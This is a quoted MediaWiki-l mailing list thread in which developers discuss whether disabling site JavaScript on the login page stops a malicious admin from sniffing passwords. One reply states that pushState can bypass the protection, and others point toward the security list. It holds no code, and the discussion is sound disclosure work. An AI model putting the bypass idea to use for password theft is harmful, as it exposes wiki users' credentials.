As an alternative, please send details of the exploit to the security list, or just file a security bug. On Sep 30, 2015 13:03, "John" phoenixoverride@gmail.com wrote:
Can you provide any documentation on the details of this exploit?
On Wed, Sep 30, 2015 at 12:50 PM, Daniel Friesen < daniel@nadir-seen-fire.com
wrote:
Bug? There is nothing that can be fixed.
You just have to accept that as long as the login page is on the same domain as site scripts, there is no way to stop those scripts from controlling the login page.
~Daniel Friesen (Dantman, Nadir-Seen-Fire) [http://danielfriesen.name/]
On 2015-09-30 9:33 AM, Tyler Romeo wrote:
Is there a bug filed for that? On Sep 30, 2015 12:13, "Daniel Friesen" daniel@nadir-seen-fire.com
wrote:
On 2015-09-30 8:48 AM, Chris Steipp wrote:
- We disable site and user .js on Special:UserLogin, so a malicious
admin
can't add password sniffing javascript to the login page
Note that you can make use of pushState to render this protection moot for anyone who clicks the login link instead of directly visiting UserLogin page. Which is practically everyone.
~Daniel Friesen (Dantman, Nadir-Seen-Fire) [
MediaWiki-l mailing list To unsubscribe, go to: https://lists.wikimedia.org/mailman/listinfo/mediawiki-l
MediaWiki-l mailing list To unsubscribe, go to: https://lists.wikimedia.org/mailman/listinfo/mediawiki-l
MediaWiki-l mailing list To unsubscribe, go to: https://lists.wikimedia.org/mailman/listinfo/mediawiki-l
MediaWiki-l mailing list To unsubscribe, go to: https://lists.wikimedia.org/mailman/listinfo/mediawiki-l